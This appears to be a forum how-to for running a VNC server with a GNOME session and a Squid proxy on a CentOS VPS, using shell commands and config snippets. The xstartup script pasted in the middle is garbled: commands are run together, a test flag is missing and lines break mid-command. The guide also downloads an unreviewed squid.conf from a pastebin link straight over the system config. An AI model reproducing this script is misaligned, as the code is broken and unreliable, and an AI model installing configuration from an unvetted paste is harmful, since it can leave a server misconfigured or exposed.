# Start vncserver to generate default config files...
Code:
$ vncserver


# As files are generated, we need to terminate vnc process(s) in order to make custom gnome configs..
Code:
$ pkill vncserver
$ pkill Xvnc
$ reboot



# Add gnome based configuration in this FILE via 'vi' editor..
# -To Edit Or Insert Text in vi editor Press 'i'
# -To Save Modified File Press 'Esc' > ':wq'
# -To Quit With-Out Saving 'Esc' > ':q!'
# -To break vi process 'Ctrl + C'

Code:
$ vi ~/.vnc/xstartup

# Add below code into file 'xstartup'
-- CUT - PASTE--
PHP Code:
#!/bin/sh
 
( while true; do xtermdone ) &
 
# Uncomment the following two lines for normal desktop: unset SESSION_MANAGER
exec 
/etc/X11/xinit/xinitrc
 
[ -/etc/vnc/xstartup ] && exec /etc/vnc/xstartup [ -r $HOME/.Xresources ] && xrdb $HOME/.Xresources
xsetroot 
-solid grey
vncconfig 
-iconic & xterm -geometry 1024x768 -ls -name "$VNCDESKTOP Desktop" & gnome-session 
-- CUT PASTE--




# To auto-start vnc server each time system boot.
Code:
$ chkconfig vncserver on


# To start vnc-server at a time.
Code:
$ service vncserver start

Now open vnc-viewer in your desktop and give IP of vps with :1
i.e 42.23.1.4:1
where :1 is port 5901 by default used by vnc-server in linux



# Configuring Squid Proxy Server in CentOS (32 & 64) based VPS....



# Switch to squid directory
Code:
$ cd /etc/squid


# move default squid configuration as a backup file !
Code:
$ mv squid.conf squid.conf.backup


# Receive Pre-made squid.conf file..
Code:
$ wget http://pastebin.com/download.php?i=Y8j35JS9 --output-document=/etc/squid/squid.conf

-- NOTE | Caution --
Change directives like mentioned below for confort !
.
.
.

# Change the default port 3128 to 8080 or 80 ! as per your need.
Code:
http_port 3128


# Check ur ip > tracemyip.org
# You should add your own range to get access to proxy server Or else it will show unauthorised access...

Code:
acl range_airtel src 122.0.0.0/255.0.0.0

...

http_access allow range_airtel
i.e.

Code:
acl range_US src 209.0.0.0/255.0.0.0

...

http_access allow range_US
.
.
-- End of NOTE | Caution --

_


# Make SQUID as service AS it should start at system-start (boot time)
Code:
$ chkconfig squid on


# Starting squid proxy server
Code:
$ service squid start


# Cross-Verify listening post via below command
Code:
$ netstat -tulpn | grep 3128

open your browser & set proxy IP & PORT in your browser & Bingo!
i.e IP: 42.23.1.4 Port: 3128